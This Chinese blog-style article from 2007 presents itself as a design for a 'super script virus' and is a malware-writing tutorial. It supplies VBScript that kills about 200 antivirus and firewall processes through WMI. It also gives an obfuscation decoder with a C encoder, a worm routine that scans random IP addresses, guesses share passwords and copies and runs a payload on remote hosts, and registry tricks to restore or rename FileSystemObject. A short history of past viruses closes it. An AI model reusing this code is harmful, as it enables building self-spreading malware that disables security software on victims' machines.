快捷導(dǎo)航

對超級腳本病毒的構(gòu)思

更新時間：2007年01月16日 00:00:00 作者：

對超級腳本病毒的構(gòu)思
告別了以往愛出風(fēng)頭，愛吹牛皮的時代，學(xué)點真本事才是硬道理。好好學(xué)習(xí)，天天向上。下面是對超級腳本病毒的構(gòu)想。
腳本病毒的制造非常的容易，對于一個對編程一竅不通的人來說，只要對windows系統(tǒng)和注冊表有足夠的了解，在到網(wǎng)絡(luò)上下載幾個病毒代碼仔細(xì)看看，就能在短時間內(nèi)寫出一個病毒的變種體來，腳本病毒的特征性就是那么幾個，沒有多少編程技巧而言，所以真正的病毒制造者是不用vbscript寫病毒的，現(xiàn)在由于腳本語言的流行，以及Micrsoft推出的WSH(Windows Script Hosting),更讓這些腳本語言可以在一臺計算機上興風(fēng)作浪。WSH是一個能讓Visual Basic Script和JScript腳本在Windows環(huán)境下，如命令行里的批處理文件一樣運行的一個服務(wù)。
它可以讓Script去創(chuàng)建一個Windows里的COM/OLE對象，并去使用這些對象里的方法，屬性和事件。腳本病毒的制造非常的容易，對于一個對編程一竅不通的人來說，只要對windows系統(tǒng)和注冊表有足夠的了解，在到網(wǎng)絡(luò)上下載幾個病毒代碼仔細(xì)看看，就能在短時間內(nèi)寫出一個病毒的變種體來.因此腳本病毒容易寫,也容易被清楚和防范,網(wǎng)上針對怎樣防范它的文章可謂多如牛毛,人亦發(fā)展,病毒也要進(jìn)化。假設(shè)：老貓開始訓(xùn)練了，老鼠如果不訓(xùn)練那不是找死嘛。
1，現(xiàn)在的很多殺毒軟件都能對未知的腳本病毒做出判斷，所以病毒要想生存就必須做出更好的保護(hù)：
(1).病毒要用到大量的VMI，使其可以殺掉殺毒軟件或防火墻的進(jìn)程，這里我給出一段代碼:
do
strComputer = "."
Set objWMIService = GetObject(""winmgmts:"" & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")
fv = Array(""Notepad.exe"", ""pccguide.exe"", ""pccclient.exe"",""Rfw.exe"", ""DAVPFW.exe"", ""vpc32.exe"", ""ravmon.exe"", ""debu.exe"", ""scan.exe"", ""mon.exe"", ""vir.exe"", ""iom.exe"", ""ice.exe"", ""anti.exe"", ""fir.exe"", ""prot.exe"", ""secu.exe"", ""dbg.exe"", ""pcc.exe"", ""avk.exe"", ""spy.exe"", ""pcciomon.exe"", ""pccmain.exe"", ""pop3trap.exe"", ""webtrap.exe"", ""vshwin32.exe"", ""vsstat.exe"", ""navapw32.exe"", ""lucomserver.exe"", ""lamapp.exe"", ""atrack.exe"", ""nisserv.exe"", ""vavrunr.exe"", ""navwnt.exe"", ""pview95.exe"", ""luall.exe"", ""avxonsol.exe"", ""avsynmgr.exe"", ""symproxysvc.exe"", ""regedit.exe"", ""smtpsvc.exe"", ""moniker.exe"", ""program.exe"", ""explorewclass.exe"", ""rn.exe"", ""ms.exe"", ""microsoft.exe"", ""office.exe"", ""smtpsvc.exe"", ""avconsol.exe"", ""avsunmgr.exe"", ""vsstat.exe"", ""navapw32.exe"", ""navw32.exe"", ""nmain.exe"", ""luall.exe"", ""lucomserver.exe"", ""iamapp.exe"", ""atrack.exe"", ""nisserv.exe"", ""rescur32.exe"", ""nisum.exe"", "" navlu32.exe"", ""navrunr.exe"", ""pview95.exe"", ""f-stopw.exe"", ""f-prot95.exe"", ""pccwin98.exe"", ""fp-win.exe"", ""nvc95.exe"", ""norton.exe"", ""mcafee.exe"", ""antivir.exe"", ""webscanx.exe"", ""safeweb.exe"", ""cfinet.exe"", ""cfinet32.exe"", ""avp.exe"", ""lockdown2000.exe"", ""lockdown2002.exe"", ""zonealarm.exe"", ""wink.exe"", ""sirc32.exe"", ""scam32.exe"", ""regedit.exe"", ""tmoagent.exe"", ""tmntsrv.exe"", ""tmproxy.exe"", ""tmupdito.exe"", ""tsc.exe"", ""krf.exe"", ""kpfw32.exe"", ""_avpm.exe"", ""autodown.exe"", ""avkser.exe"", ""avpupd.exe"", ""blackd.exe"", ""cfind.exe"", ""cleaner.exe"", ""ecengine.exe"", ""fp-win.exe"", ""iamserv.exe"", ""lcloadnt.exe"", ""lookout.exe"", ""n32acan.exe"", ""navw32.exe"", ""normist.exe"", ""padmin.exe"", ""pccwin98.exe"", ""rav7win.exe"", ""smc.exe"", ""tca.exe"", ""vettray.exe"", ""ackwin32.exe"", ""avpnt.exe"", ""avpdos32.exeP"", ""avsched32.exe"", ""blackice.exe"", ""efinet32.exe"", ""esafe.exe"", ""ibmasn.exe"", ""icmoon.exe"", ""navapw32.exe"", ""nupgrade.exe"", ""pavcl.exe"", ""pcfwallicon.exe"", ""scanpm.exe"", ""sphinx.exe"", ""sphinx.exe"", ""tds2-98.exe"", ""vsscan40.exe"", ""webscanx.exe"", ""webscan.exe"", ""anti-trojan.exe"", ""ave32.exe"", ""avp.exe"", ""avpm.exe"", ""cfiadmin.exe"", ""dvp95.exe"", ""espwatch.exe"", ""ibmavsp.exe"", ""icsupp95.exe"",""jed.exe"", ""moolive.exe"", ""nisum.exeP"", ""nvc95.exe"", ""navsched.exe"", ""persfw.exe"", ""safeweb.exe"", ""scrscan.exe"", ""sweep95.exe"", ""tds2-nt.exe"", ""_avpcc.exe"", ""apvxdwin.exe"", ""avwupd32.exe"", ""cfiaudit.exe"", ""claw95ct.exe"", ""dv95_O.exe"", ""f-agnt94.exe"", "" findviru.exe"", ""iamapp.exe"", ""icload95.exe"", ""icssuppnt.exe"", ""mpftray.exe"", ""nmain.exe"", ""rav7.exe"", ""scan32.exe"", ""serv95.exe"", ""vshwin32.exe"", ""zonealarm.exe"", ""avpmon.exe"", ""avp32.exe"", ""kavsvc.exe"", ""mcagent.exe"", ""nvsvc32.exe"", ""mcmnhdlr.exe"", ""regsvc.exe"", ""mailmon.exe"", ""fp-win.exe"", ""mghtml.exe"")"
for Each fa in fv
Set colProcessList = objWMIService.ExecQuery (""Select * from Win32_Process Where Name = ’""&fa&""’"")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
next
loop
Array()數(shù)組存放了200多個殺毒軟件和防火墻的主進(jìn)程，當(dāng)然你可以在程序的一開始就定義這個數(shù)組，在下面的感染函數(shù)部分中，用它就可以刪除這些軟件的主程序體。豬都能想到的問題，不需要我再說了把。因為我的網(wǎng)名也叫“豬豬”，這些必須要搶在殺毒軟件之前運行起來才能達(dá)到目的。
(2).病毒要盡可能的用到變形功能，使用新的加密算法，當(dāng)然腳本的加密算法是很簡單的，在這一點上新歡樂時光就做的很好.
Execute DeCode("kqe`mv fcjjm ")
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
下面給出一個c的示例（技術(shù)不過關(guān)，請各位老大指教 Hackercc@qq.com ）
#include <string.h>
#include <stdio.h>
main()
{
FILE *in,*out,*read;
char *exc="Execute DeCode(\"";
char *excu="\")\n";
char *func="Function DeCode(Coded)\nFor i=1 To Len(Coded)\nCurchar=Mid(Coded,i,1)\n";
char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\n";
char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\nElse Curchar=chr(Asc(Curchar)-2)\nend if\nDeCode=Decode & Curchar\nNext\nEnd function\n";
char buf[100][101];
char name[30];
char ch;
char *p;
int i=0,j=0;
gets(name);
if((in=fopen(name,"r+"))==NULL)
{
printf("Can’t open the file %",name);
exit(0);
}
ch=getc(in);
while(!feof(in))
{
if(ch==15) ch=10;
else if(ch==16) ch=13;
else if(ch==17) ch=32;
else if(ch==18) ch=9;
else ch=ch-2;
fseek(in,-1L,1);
fputc(ch,in);
fseek(in,0L,1);
ch=getc(in);
}
fclose(in);
read=fopen(name,"r+");
do
{
if(i>=100)
{
fclose(in);
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(read);
out=fopen(name,"w+");
fputs(exc,out);
for(;j<i-1;j++)
{
fputs(buf[j],out);
}
fputs(excu,out);
fputs(func,out);
fputs(funct,out);
fputs(functi,out);
fclose(out);
}

2, 病毒的攻擊性可以擴展到有系統(tǒng)漏洞的主機上，蠕蟲可以利用一些基本的DOS命令和第三方黑客工具來進(jìn)行漏洞攻擊
3，病毒利用郵件和局域網(wǎng)進(jìn)性傳播：
攻擊局域網(wǎng)可以采用簡化的network代碼，并利用vmi直接在遠(yuǎn)程主機上運行病毒體，且可以破譯共享密碼(窮解太費時間,沒什么必要)：
Sub netshare()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k
count = "0"
dot = "."
driveconnected="0"
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject")
set net=createobject("wsc"+"ript.n"+"etwork")
set qq=createobject("WSc"+"ript.S"+"hell")
on error resume next
randomize
randaddress()
do
do while driveconnected ="0"
checkadress()
sharename()
pwd = ""
pqd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For k = 1 to len(strings) step 1
net.mapnetworkdrive "I:", "\\" & "name" &"\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)"
If instr(net.Body, Wrong) <> 0 Then
pwd = pwd & mid(strings,k,1)
End If
Next
'破譯共享密碼
enumdrives()
loop
copy()
disconnectdrive()
qq "\\name\con\con",0
run ()
loop
end sub
function run()
Dim Controller, RemoteScript
Set Controller = WScript.CreateObject("WSHC"+"ontroller")
Set RemoteScript = Controller.CreateScript("system.vbe", "name")
WScript.ConnectObject RemoteScript, "remote_"
RemoteScript.Execute
Do While RemoteScript.Status <> 2
WScript.Sleep 100
Loop
WScript.DisconnectObject RemoteScript
remote_Error()
end function
Sub remote_Error
Dim theError
Set theError = RemoteScript.Error
WScript.Echo "Error " & theError.Number & " - Line: " & theError.Line & ", Char: " & theError.Character & vbCrLf & "Description: " & theError.Description
WScript.Quit -1
End Sub
Function disconnectdrive()
net.removenetworkdrive "I:"
driveconnected = "0"
end function
Function copy()
yu.copyfile dir2&"\system.vbe", "I:\windows\"
yu.copyfile dir2&"\system.vbe", "I:\windows\system32\"
yu.copyfile dir2&"\system.vbe", "I:\winnt\system32\"
yu.copyfile dir2&"\system.inf", "I:\winnt\system32\"
yu.copyfile dir2&"\system.inf", "I:\windows\system32\"
'復(fù)制到對方的機器上。
end function
Function checkaddress()
o4 = o4 +1
if o4 = "255" then randaddress()
end function
Function sharename()
name = " octa & dot & octb & dot & octc & dot & octd "
end function
Function enumdrives()
set you=net.enumnetworkdrives
For p = 0 to you.Count -1
if name = you.item(p) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function
Function randum()
rand = int((254 * rnd) + 1)
end function
Function randaddress()
if count < 50 then
o1=Int((16) * Rnd + 199)
coun=count + 1
else
randum()
o1=rand
end if
randum()
o2=rand
randum()
o3=rand
o4="1"
end function
4,有些Windows的高級用戶為了防范腳本病毒，把注冊表中的filesystemobject項給刪掉了，新的蠕蟲將在執(zhí)行的開始，
檢查系統(tǒng)的filesystemobject項是否存在，如果不存在的話，將重新寫入filesystemobject項，當(dāng)然你也可以將其換個名稱，這樣有些
殺毒軟件就不一定認(rèn)識了，
On Error Resume Next
Set wa=CreateObject("WSc"+"ript.S"+"hell")
tt=wa.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
if tt=1 then
wa.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 00000000, "REG_DWORD"
end if
uu=wa.RegRead("HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}")
if uu="" then
uu.RegWrite "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ"
end if
或者
a.regdelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\"
a.regdelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\"
a.regwrite "HKEY_CLASSES_ROOT\wangzhitong\", "FileSystem Object", "REG_SZ"
a.regwrite "HKEY_CLASSES_ROOT\wangzhitong\CLSID\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
set yu=createobject("wangzhitong")
以后系統(tǒng)內(nèi)的filesystemobject項就被替換成了wangzhitong.
6,自己寫好的蠕蟲怎能讓其他的蠕蟲一起存在一個系統(tǒng)中呢，所以要勁可能的消滅其他的病毒程序。當(dāng)然你要先分析那些病毒程序，只要清除掉他們就行了。
--------------------------------------------------------------------------------------------

簡單的從別的地方復(fù)制了一些計算機病毒歷史記錄給大家參考
1999/3/，一個名為“梅麗莎”(Melissa)的計算機病毒席卷歐、美各國的計算機網(wǎng)絡(luò)。這種病毒利用郵件系統(tǒng)大量復(fù)制、傳播，
造成網(wǎng)絡(luò)阻塞，甚至癱瘓。并且，這種病毒在傳播過程中，還會造成泄密。
2000/5/：“愛蟲”(LoveLetter)病毒出現(xiàn)?！皭巯x”病毒是一種腳本病毒，它通過微軟的電子郵件系統(tǒng)進(jìn)行傳播。這一病毒的郵件主題為“I Love You”，包含一個附件“Love-Letter-for-you.txt.vbs”，一旦在微軟電子郵件中打開這個附件，系統(tǒng)就會自動復(fù)制并向用戶通訊簿中所有的電子郵件地址發(fā)送這一病毒，其傳播速度比“梅莉沙”病毒還要快好幾倍。
2001/1/21
一種變形的“梅麗莎”病毒侵襲麥金塔（Ｍａｃｉｎｔｏｓｈ）電腦。這種病毒能感染Ｍａｃ文件，
病毒產(chǎn)生的大量電子郵件可以堵塞服務(wù)器，修改微軟Ｗｏｒｄ程序的設(shè)置，感染文件和模板。
攜帶這種“梅麗莎”病毒的電子郵件附件名叫“Ａｎｎｉｖ．ＤＯＣ”。這是這種類型的病毒第一次將矛頭指向了麥金塔電腦。
2001/2/15
荷蘭警方１３日逮捕了一名自稱發(fā)明了“庫爾尼科娃”電腦病毒的２０歲男子。此人要面臨坐牢４年的處罰。
通過電子郵件傳播的“庫爾尼科娃”病毒１２日在歐洲、美洲和亞洲發(fā)作，大量垃圾郵件積壓在電子郵件系統(tǒng)內(nèi)，
系統(tǒng)速度明顯變慢，有的公司干脆關(guān)閉了電子郵件系統(tǒng)。這名荷蘭男子自稱是１９歲的俄羅斯網(wǎng)球女星安娜·庫爾尼科娃的球迷
這個病毒的作者說，他不是編程專家，不過是從互聯(lián)網(wǎng)上下載了病毒，然后編寫程序完成的。
2001/5/6
一種新的惡性電腦病毒“歡樂時光”（Ｈａｐｐｙｔｉｍｅ／ＶＢＳＨａｐｐｙｔｉｍｅ．Ａ．Ｗｏｒｍ）已在中國開始傳播。
“歡樂時光”病毒很可能是一種國產(chǎn)病毒，它是類似“愛蟲”的蠕蟲類病毒。用戶通過美國微軟公司辦公套件（Ｏｕｔｌｏｏｋ）
收取帶有“歡樂時光”病毒的郵件時，無論用戶是否打開郵件，只要鼠標(biāo)指向帶毒的郵件，“歡樂時光”病毒即被激活，
隨后立即傳染硬盤中的文件。感染“歡樂時光”病毒后，如果電腦時鐘的日期和月份之和為１３，
則該病毒將逐步刪除硬盤中的ＥＸＥ和Ｄｌｌ文件，最后導(dǎo)致系統(tǒng)癱瘓。
2001/5/11
新病毒“主頁”正在全球傳播，這種被稱作“ＨｏｍｅＰａｇｅ”的病毒被看作是“庫爾尼科娃”病毒的“遠(yuǎn)親”。攜帶這種電腦病毒的郵件題目為“主頁”，郵件正文寫道：“嗨，你應(yīng)該看看這個網(wǎng)頁，它確實很酷?！编]件中夾帶著一個名為“ＨＯＭＥＰＡＧＥ．ＨＴＭＬ．ＶＢＳ”的附件。用戶一旦打開附件，病毒第一步先自我復(fù)制，并向微軟Ｏｕｔｌｏｏｋ地址簿中的每一個地址發(fā)去一封攜毒郵件。然后搜索Ｏｕｔｌｏｏｋ收件箱，將其中名為“主頁”的信件統(tǒng)統(tǒng)刪除，同時打開數(shù)個色情網(wǎng)頁。值得慶幸的是，上述病毒沒有造成太大的破壞，不到１萬臺電腦受此影響陷入了癱瘓。由于時差的關(guān)系，美國地區(qū)的防病毒公司在接到來自東半球的消息后，對病毒加以防范，成功抵制了病毒進(jìn)一步擴散。(來源：歲月聯(lián)盟作者：豬豬)